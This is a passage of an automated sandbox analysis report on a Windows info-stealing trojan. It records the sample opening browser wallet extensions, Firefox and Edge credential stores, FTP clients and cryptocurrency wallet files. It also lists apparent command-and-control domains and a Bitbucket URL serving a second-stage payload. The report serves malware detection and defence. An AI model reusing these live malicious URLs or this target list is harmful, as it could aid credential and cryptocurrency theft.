                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: Process Memory Space: zLP3oiwG1g.exe PID: 7300, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: zLP3oiwG1g.exe PID: 7300, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                2
                Process Injection
                34
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                Query Registry
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                2
                Process Injection
                LSASS Memory751
                Security Software Discovery
                Remote Desktop Protocol41
                Data from Local System
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information
                Security Account Manager34
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput Capture114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials223
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                zLP3oiwG1g.exe58%VirustotalBrowse
                zLP3oiwG1g.exe61%ReversingLabsWin32.Trojan.Amadey
                zLP3oiwG1g.exe100%AviraTR/Crypt.TPM.Gen
                zLP3oiwG1g.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                s3-w.us-east-1.amazonaws.com
                52.217.67.100
                truefalse
                  high
                  bitbucket.org
                  185.166.143.48
                  truefalse
                    high
                    observerfry.lat
                    104.21.36.201
                    truefalse
                      high
                      bbuseruploads.s3.amazonaws.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        slipperyloo.lattrue
                          unknown
                          curverpluch.lattrue
                            unknown
                            tentabatte.lattrue
                              unknown
                              manyrestro.lattrue
                                unknown
                                bashfulacid.lattrue
                                  unknown
                                  https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exefalse
                                    high
                                    observerfry.lattrue
                                      unknown
                                      wordyfindy.lattrue
                                        unknown
                                        https://observerfry.lat/apitrue
                                          unknown
                                          shapestickyr.lattrue
                                            unknown
                                            talkynicer.lattrue
                                              unknown
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://bitbucket.org/Q=zLP3oiwG1g.exe, 00000000.00000003.1618522019.0000000000377000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543259911.000000000037A000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000377000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/chrome_newtabzLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000377000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://duckduckgo.com/ac/?q=zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://observerfry.lat/szLP3oiwG1g.exe, 00000000.00000003.1470717759.000000000037E000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1466927575.000000000037E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://observerfry.lat/pizLP3oiwG1g.exe, 00000000.00000003.1470717759.000000000037E000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1466927575.000000000037E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_PrzLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netzLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpgzLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://remote-app-switcher.prod-east.frontend.public.atl-paas.netzLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://x1.c.lencr.org/0zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://x1.i.lencr.org/0zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0zLP3oiwG1g.exe, 00000000.00000002.1887616838.00000000001BA000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYizLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchzLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeT2zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://aui-cdn.atlassian.com/zLP3oiwG1g.exe, 00000000.00000003.1618442191.00000000051AE000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exexzLP3oiwG1g.exe, 00000000.00000002.1887811563.000000000030B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://observerfry.lat/H(zLP3oiwG1g.exe, 00000000.00000003.1483664745.00000000051C2000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1444894119.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1418508560.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445178694.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445027007.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1420455624.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442892518.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442445932.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445987512.00000000051C2000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543194348.00000000051BD000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445509932.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1418683409.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543075788.00000000051BC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442722226.00000000051BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&ctazLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://support.mozilla.org/products/firefoxgro.allzLP3oiwG1g.exe, 00000000.00000003.1420184620.000000000525A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://observerfry.lat:443/apizLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://observerfry.lat:443/apin.txtPKzLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://bitbucket.org/zLP3oiwG1g.exe, zLP3oiwG1g.exe, 00000000.00000003.1543259911.000000000037A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://bbuseruploads.s3.amazonaws.com:443$$zLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netzLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://bbuseruploads.s3.amazonaws.com/pzLP3oiwG1g.exe, 00000000.00000003.1618522019.0000000000377000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exezLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icozLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://web-security-reports.services.atlassian.com/csp-report/bb-websitezLP3oiwG1g.exe, 00000000.00000003.1618442191.00000000051AE000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://observerfry.lat/api&04zLP3oiwG1g.exe, 00000000.00000003.1543259911.000000000037A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
